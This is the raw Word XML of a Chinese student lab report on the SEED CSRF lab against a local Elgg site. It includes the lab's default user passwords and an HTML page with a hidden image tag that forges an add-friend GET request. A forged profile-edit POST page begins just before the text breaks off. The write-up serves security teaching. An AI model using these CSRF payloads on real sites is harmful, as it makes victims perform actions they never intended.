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46CA4B" w14:textId="73CE6C51" w:rsidR="002317D9" w:rsidRDefault="009D60D8" w:rsidP="009D60D8">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第四次实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511E5091" w14:textId="5A19DF99" w:rsidR="009D60D8" w:rsidRDefault="009D60D8" w:rsidP="009D60D8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ask</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA3D5BD" w14:textId="119DD468" w:rsidR="009D60D8" w:rsidRDefault="00D955AB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28B60BA1" wp14:editId="7E39FCA2">
            <wp:extent cx="5274310" cy="2463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4F81" w14:textId="15A0480C" w:rsidR="00D955AB" w:rsidRDefault="00D955AB">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8AD4E" w14:textId="22EB5886" w:rsidR="00DE4CC0" w:rsidRDefault="00DE4CC0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018EA6E1" wp14:editId="58A4BC0F">
            <wp:extent cx="3079908" cy="1670136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C22E" w14:textId="3D7AAF13" w:rsidR="00043C99" w:rsidRDefault="00043C99">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击这里</w:t>
      </w:r>
      <w:r w:rsidR="00E904B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，即可打开插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F74128" w14:textId="269B2F31" w:rsidR="00043C99" w:rsidRDefault="00043C99">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0AEF0C" wp14:editId="0A81717C">
            <wp:extent cx="1035103" cy="33021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22A0" w14:textId="40D814ED" w:rsidR="00E904B6" w:rsidRDefault="003A05F7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA78EE8" wp14:editId="39C17AEA">
            <wp:extent cx="5274310" cy="17430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CBAE" w14:textId="2519D39D" w:rsidR="007713A9" w:rsidRDefault="007713A9"/>
    <w:p w14:paraId="6AD7FC2F" w14:textId="55A9EE6B" w:rsidR="007713A9" w:rsidRDefault="007713A9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录 </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00607429">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.csrflabelgg.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="004309CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004309CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，访问成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6EFF5" w14:textId="732C70FC" w:rsidR="007713A9" w:rsidRDefault="004309CB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FA356A" wp14:editId="673EC344">
            <wp:extent cx="4117245" cy="20417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376" cy="20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65E4" w14:textId="477613E9" w:rsidR="004309CB" w:rsidRDefault="004309CB"/>
    <w:p w14:paraId="0DF66899" w14:textId="7E5DC517" w:rsidR="004309CB" w:rsidRDefault="00AB33CE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已知用户如下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8"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="1418"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB33CE" w:rsidRPr="00AB33CE" w14:paraId="02BF7142" w14:textId="77777777" w:rsidTr="00AB33CE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08D8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User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CF228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UserName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F29808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>Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB33CE" w:rsidRPr="00AB33CE" w14:paraId="1A766D58" w14:textId="77777777" w:rsidTr="00AB33CE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89851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Admin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Alice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Boby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Charlie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Samy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1CC5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 xml:space="preserve">admin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alice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boby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charlie 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 xml:space="preserve">samy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464A9" w14:textId="77777777" w:rsidR="00AB33CE" w:rsidRPr="00AB33CE" w:rsidRDefault="00AB33CE" w:rsidP="00AB33CE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t>seedelgg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seedalice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seedboby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seedcharlie</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB33CE">
              <w:rPr>
                <w:rFonts w:ascii="NimbusRomNo9L-Regu" w:eastAsia="宋体" w:hAnsi="NimbusRomNo9L-Regu" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>seedsamy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38490B97" w14:textId="74A751A5" w:rsidR="004309CB" w:rsidRDefault="004309CB"/>
    <w:p w14:paraId="51F41430" w14:textId="0EFEAB17" w:rsidR="00043C99" w:rsidRDefault="009F2740">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用admin账号登录，打开插件，记录登录过程。</w:t>
      </w:r>
      <w:r w:rsidR="002C605B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现插件不好用，</w:t>
      </w:r>
      <w:r w:rsidR="00D54246">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接使用开发者工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF63E50" w14:textId="0EEB0903" w:rsidR="00D54246" w:rsidRDefault="00D54246">
      <w:r>
        <w:t xml:space="preserve">F12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C57202" w14:textId="57FB996A" w:rsidR="00D54246" w:rsidRDefault="00863DD5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A39656D" wp14:editId="08DBFE41">
            <wp:extent cx="5274310" cy="18605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49A8" w14:textId="2DD86073" w:rsidR="009F2740" w:rsidRDefault="00863DD5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先是post方法请求域名下的login，3</w:t>
      </w:r>
      <w:r>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应，重定向到根目录之下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F8F803" w14:textId="5164497D" w:rsidR="00863DD5" w:rsidRDefault="00863DD5">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ost参数为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F641CCD" w14:textId="3A485BEE" w:rsidR="00863DD5" w:rsidRDefault="00FB01C7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51C2A3D9" wp14:editId="3314A69B">
            <wp:extent cx="3441877" cy="1104957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8837" w14:textId="6F0BD59D" w:rsidR="00FB01C7" w:rsidRDefault="00835D1E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而后get请求根目录，3</w:t>
      </w:r>
      <w:r>
        <w:t>02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重定向到activity</w:t>
      </w:r>
      <w:r w:rsidR="009951E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，此次get请求无参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB03762" w14:textId="29C39309" w:rsidR="00835D1E" w:rsidRDefault="00835D1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EEC9443" wp14:editId="2DFDC4C7">
            <wp:extent cx="5274310" cy="14636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3F1E" w14:textId="686754E0" w:rsidR="00420D6D" w:rsidRDefault="00420D6D" w:rsidP="00420D6D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>之后的请求都是返回2</w:t>
      </w:r>
      <w:r>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态码，且均为get方式无参数请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730E1F6" w14:textId="5BB16CE7" w:rsidR="00420D6D" w:rsidRDefault="00420D6D" w:rsidP="00420D6D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:t>k2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ABB628" w14:textId="2E43BF83" w:rsidR="00420D6D" w:rsidRDefault="00067973">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先以alice登录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3863BB31" w14:textId="2428DC10" w:rsidR="009951E0" w:rsidRDefault="00B751F5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索bob</w:t>
      </w:r>
      <w:r w:rsidR="005B2067">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59834EC3" w14:textId="4E8F15B2" w:rsidR="009951E0" w:rsidRDefault="009712C5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5497E27B" wp14:editId="65559E61">
            <wp:extent cx="5274310" cy="1657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3D3B" w14:textId="03E7AA02" w:rsidR="005B2067" w:rsidRDefault="005B2067">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加好友，查看请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2604B67E" w14:textId="1DD9D2A6" w:rsidR="00FE4836" w:rsidRDefault="00FE4836">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先要清除一下缓存，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4872D9BC" w14:textId="110766A6" w:rsidR="00FE4836" w:rsidRDefault="00FE4836">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63F9ADD8" wp14:editId="37660D21">
            <wp:extent cx="5274310" cy="342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9A9" w14:textId="77B4D884" w:rsidR="005B2067" w:rsidRDefault="00FE4836">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后点击add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000676CF">
        <w:t>friend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DBFD2" w14:textId="2796E340" w:rsidR="000676CF" w:rsidRDefault="000676CF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66919A80" wp14:editId="7AE112B0">
            <wp:extent cx="2292468" cy="221626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C4B9" w14:textId="170C0A36" w:rsidR="000676CF" w:rsidRDefault="00690171">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有如下请求</w:t>
      </w:r>
      <w:r w:rsidR="00B62D37">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和响应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F079AF" w14:textId="76DE977E" w:rsidR="00B62D37" w:rsidRDefault="00B62D37">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C223FBF" wp14:editId="6DA1E517">
            <wp:extent cx="2608366" cy="2547606"/>
            <wp:effectExtent l="0" t="0" r="190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907" cy="25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B97" w14:textId="4551B851" w:rsidR="00B62D37" w:rsidRDefault="00B62D37">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>具体参数如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33807508" w14:textId="57F8D038" w:rsidR="00690171" w:rsidRDefault="00690171">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F58D4EC" wp14:editId="6CB54347">
            <wp:extent cx="5274310" cy="914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B8BC" w14:textId="69E92CCF" w:rsidR="000676CF" w:rsidRDefault="00202F11">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et请求，只需要伪造这个url即可，上图url如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3168F5A4" w14:textId="2EB7EDDE" w:rsidR="00202F11" w:rsidRDefault="002A4C1A">
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidR="00202F11" w:rsidRPr="00607429">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.csrflabelgg.com/action/friends/add?friend=43&amp;__elgg_ts=1599724915&amp;__elgg_token=2rA_9cc7S6L8E</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2D84507C" w14:textId="383A40EB" w:rsidR="00202F11" w:rsidRDefault="003B3802">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r w:rsidRPr="003B3802">
        <w:t>/var/www/CSRF/Attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录，创建index</w:t>
      </w:r>
      <w:r>
        <w:t>.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="005E5D65">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入html攻击代码，只需要模拟friend参数即可，剩下两个参数检测没有开启。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD94812" w14:textId="0A7C5150" w:rsidR="00561447" w:rsidRDefault="00561447">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用img标签，直接将get攻击链接替换为src的链接，即可实现自动访问这个get链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64933BF5" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F700DED" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D33AD5" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t xml:space="preserve">  &lt;h1&gt;This page forges an HTTP GET request.&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A84A910" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t xml:space="preserve">  &lt;img src="http://www.csrflabelgg.com/action/friends/add?friend=43"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56A0AE" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t xml:space="preserve">       alt="img" width="1" height="1"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5F1332" w14:textId="77777777" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t>&lt;body/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3B773" w14:textId="3DD69427" w:rsidR="005E5D65" w:rsidRDefault="005E5D65" w:rsidP="005E5D65">
      <w:r>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE775A" w14:textId="1C35BA13" w:rsidR="00C36FDA" w:rsidRDefault="00C36FDA" w:rsidP="005E5D65"/>
    <w:p w14:paraId="5430207A" w14:textId="44884869" w:rsidR="00C36FDA" w:rsidRDefault="00C36FDA" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使alice访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidR="00561447" w:rsidRPr="00607429">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.csrflabattacker.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00561447">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可实现攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4EAAA7" w14:textId="74834F28" w:rsidR="00561447" w:rsidRDefault="00561447" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00893A4A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录，发布包含此链接的blog。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80B9D3" w14:textId="6008CA6C" w:rsidR="009F0D1C" w:rsidRDefault="009F0D1C" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50FDFD6E" wp14:editId="4E13935A">
            <wp:extent cx="2880116" cy="1614127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099" cy="16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C32" w14:textId="7827AA14" w:rsidR="009F0D1C" w:rsidRDefault="009F0D1C" w:rsidP="005E5D65">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lice登录并点击</w:t>
      </w:r>
      <w:r w:rsidR="009475C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4B6FB" w14:textId="43DC7C72" w:rsidR="009475C7" w:rsidRDefault="009475C7" w:rsidP="005E5D65"/>
    <w:p w14:paraId="7C9F0344" w14:textId="25031FC2" w:rsidR="009475C7" w:rsidRDefault="00075469" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F545158" wp14:editId="1F312B5B">
            <wp:extent cx="1172308" cy="1882589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852" cy="18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1032">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00921032">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B710C4A" wp14:editId="5AF13EA2">
            <wp:extent cx="2470277" cy="1339919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097B" w14:textId="2B066969" w:rsidR="004462B6" w:rsidRDefault="004462B6" w:rsidP="005E5D65"/>
    <w:p w14:paraId="30069DB0" w14:textId="0DB32B96" w:rsidR="004462B6" w:rsidRDefault="004462B6" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D8BF3D6" wp14:editId="3D163ECC">
            <wp:extent cx="2235315" cy="1193861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DEB24F3" wp14:editId="0FA37B05">
            <wp:extent cx="2845887" cy="48007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8074" cy="5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8E2" w14:textId="36953FE1" w:rsidR="004462B6" w:rsidRDefault="00523AF4" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加friend成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A203D1" w14:textId="15170C5F" w:rsidR="00523AF4" w:rsidRDefault="00523AF4" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="269647A3" wp14:editId="07A9B87B">
            <wp:extent cx="3628261" cy="11130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5892" cy="11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4751" w14:textId="4D90D37C" w:rsidR="00E04D35" w:rsidRPr="00E04D35" w:rsidRDefault="00523AF4" w:rsidP="00E04D35">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Task3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AC86E" w14:textId="2350A684" w:rsidR="00523AF4" w:rsidRDefault="001B496C" w:rsidP="00523AF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="00AC5C71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>brief</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> des</w:t>
      </w:r>
      <w:r>
        <w:t>cription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C60D87" w14:textId="7AB2275B" w:rsidR="00523AF4" w:rsidRDefault="001B496C" w:rsidP="00523AF4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41A5B085" wp14:editId="0C71BFE0">
            <wp:extent cx="1416123" cy="18923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C71">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC5C71">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0043687A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A6B7F04" wp14:editId="18F49984">
            <wp:extent cx="1638384" cy="6731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B610" w14:textId="4A299B99" w:rsidR="0043687A" w:rsidRDefault="0043687A" w:rsidP="00523AF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点击save提交表单</w:t>
      </w:r>
      <w:r w:rsidR="008B7ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，post方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B48536A" w14:textId="0BB9A7BD" w:rsidR="0043687A" w:rsidRPr="00523AF4" w:rsidRDefault="00FD3BD3" w:rsidP="00523AF4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD3BD3">
        <w:t>http://www.csrflabelgg.com/action/profile/edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41354498" w14:textId="6391DB50" w:rsidR="004462B6" w:rsidRDefault="008B7ED2" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02013CBB" w14:textId="43434013" w:rsidR="004462B6" w:rsidRDefault="00EB7D14" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DB72163" wp14:editId="71F4468B">
            <wp:extent cx="5274310" cy="21551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033B" w14:textId="7CCE983D" w:rsidR="00EB7D14" w:rsidRDefault="00EB7D14" w:rsidP="005E5D65"/>
    <w:p w14:paraId="1CB36A00" w14:textId="722E2450" w:rsidR="00EB7D14" w:rsidRDefault="00E04D35" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下js文件给我们的提示，需要下面几个字段即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D781C6" w14:textId="779E59B7" w:rsidR="00E04D35" w:rsidRDefault="00E04D35" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10E4AA3C" wp14:editId="5655257A">
            <wp:extent cx="5274310" cy="696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E2DD" w14:textId="3E4DF1D1" w:rsidR="00EB7D14" w:rsidRDefault="00E04D35" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>填入我们的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F42BF82" w14:textId="4CD069C8" w:rsidR="0042392E" w:rsidRDefault="00335D2E" w:rsidP="005E5D65">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D6A0CB" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t>&lt;!doctype html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE35C4C" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t>&lt;html lang="en"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70588D33" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E"/>
    <w:p w14:paraId="102DC335" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E"/>
    <w:p w14:paraId="46A68E76" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB42645" w14:textId="77777777" w:rsidR="00335D2E" w:rsidRDefault="00335D2E" w:rsidP="00335D2E">
      <w:r>
        <w:t xml:space="preserve">    &lt;h1&gt;This page forges an HTTP POST request.&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
